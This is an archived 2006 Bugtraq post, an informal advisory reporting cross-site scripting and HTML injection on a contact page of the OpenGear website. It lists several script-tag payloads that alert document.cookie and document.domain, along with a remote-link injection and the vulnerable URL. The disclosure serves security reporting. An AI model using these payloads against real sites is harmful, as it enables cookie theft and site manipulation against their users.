XSS Bug in OpenGear Server Website

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS Bug in OpenGear Server Website
From: Aditya@xxxxxxxxxxx
Date: 24 Apr 2006 14:50:40 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

0x0*] Advisory 
==============

Web Penetrated By:- Aditya@xxxxxxxxxxx
=======================================
Hit                     :- Site Manipulation.
====
Vulnerability   :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus   :- Windows IE 6.0
==============

Injections      :-
==========         0x01] ' && ""
                   0x02] <script>Javascript:alert("Penetrated");</script>
                   0x03] <p>Penetrated</p>
                   0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
                   0x05] '';!--"<CSS_Check>=&{()}
                   0x06] '<script>javascript:alert(document.cookie);</script>
                   0x07]  '<script>javascript:alert(document.domain);</script>
                          

                                Result:-Opengear.com with alert injection.
                        
                   0x01] document.domain Injection Yields --> Opengear.com
                   0x02] document.cookie Injection Yields --> Empty string
                   0x03] Remote Linking Is Possible <a href=""></a> Working.
                   0x04] The OutBound Attack Is Also Definitive.

Site            :- http://www.Opengear.com
=======    
Vulnerable Link:
================    http://www.opengear.com/cm4000_nwcontact.html


Explanation     :- 
=============
                
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.

                =========================================================

Prev by Date: FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility
Next by Date: BK Forum <= 4.0 Remote SQL Injection
Previous by thread: FileLodge Bolt (showonlineusers.php) Cross-Site Scripting Vulnerbility
Next by thread: BK Forum <= 4.0 Remote SQL Injection
Index(es):
- Date
- Thread